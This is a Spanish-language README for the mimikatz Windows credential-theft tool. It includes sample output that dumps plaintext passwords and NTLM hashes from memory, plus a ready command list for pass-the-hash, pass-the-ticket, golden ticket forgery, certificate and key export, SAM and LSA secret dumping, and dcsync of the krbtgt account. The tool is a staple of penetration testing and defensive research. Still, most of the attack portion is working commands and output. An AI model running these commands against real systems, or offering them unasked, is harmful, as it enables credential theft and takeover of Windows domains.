
Herramienta para extraer credenciales de Windows (contraseñas, hashes, tickets de Kerberos) de la memoria y realizar ataques pass-the-hash, pass-the-ticket y golden ticket.
mimikatz es una herramienta que he creado para aprender C y hacer algunos experimentos con la seguridad de Windows.
Ahora es bien conocido por extraer contraseñas en texto plano, hashes, códigos PIN y tickets de Kerberos de la memoria. mimikatz también puede realizar pass-the-hash, pass-the-ticket o construir Golden tickets.
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( [email protected] )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
¡Pero eso no es todo! Crypto, Terminal Server, Events, ... mucha información en la GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki o en http://blog.gentilkiwi.com (en francés, sí).
Si no quieres compilarlo, los binarios están disponibles en https://github.com/gentilkiwi/mimikatz/releases
log
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
mimikatz tiene la forma de una solución de Visual Studio y un controlador WinDDK (opcional para las operaciones principales), por lo que los requisitos previos son:
mimikatz y mimilib : Visual Studio 2010, 2012 o 2013 para escritorio (2013 Express para escritorio es gratuito y es compatible con x86 y x64 - http://www.microsoft.com/download/details.aspx?id=44914)controlador mimikatz, mimilove (y la plataforma ddk2003) : Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800¡mimikatz usa SVN para el control de versiones, pero ahora también está disponible con GIT!
Puedes usar cualquier herramienta que quieras para sincronizar, ¡incluso el GIT integrado en Visual Studio 2013 =)
Build / Build Solution (puedes cambiar la arquitectura)mimikatz ya está compilado y listo para usarse. (Win32 / x64 e incluso ARM64 si tienes suerte)
MSB3073 relacionado con _build_.cmd y mimidrv, es porque el controlador no se puede compilar sin Windows Driver Kit 7.1 (WinDDK), pero mimikatz y mimilib están bien.Con esta plataforma MSBuild opcional, puedes usar las herramientas de compilación de WinDDK y el runtime msvcrt predeterminado (binarios más pequeños, sin dependencias)
Para esta plataforma opcional, son obligatorios Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 y Visual Studio 2010, incluso si planeas usar Visual Studio 2012 o 2013 después.
Sigue las instrucciones:
Licencia CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
mimikatz necesita café para desarrollarse:
gentilkiwi, puedes contactarme en Twitter ( @gentilkiwi ) o por correo ( benjamin [at] gentilkiwi.com )lsadump fueron coescritas con Vincent LE TOUX, puedes contactarlo por correo ( vincent.letoux [at] gmail.com ) o visitar su sitio web ( http://www.mysmartlogon.com )Este es un desarrollo personal, por favor respeta su filosofía y ¡no lo uses para cosas malas!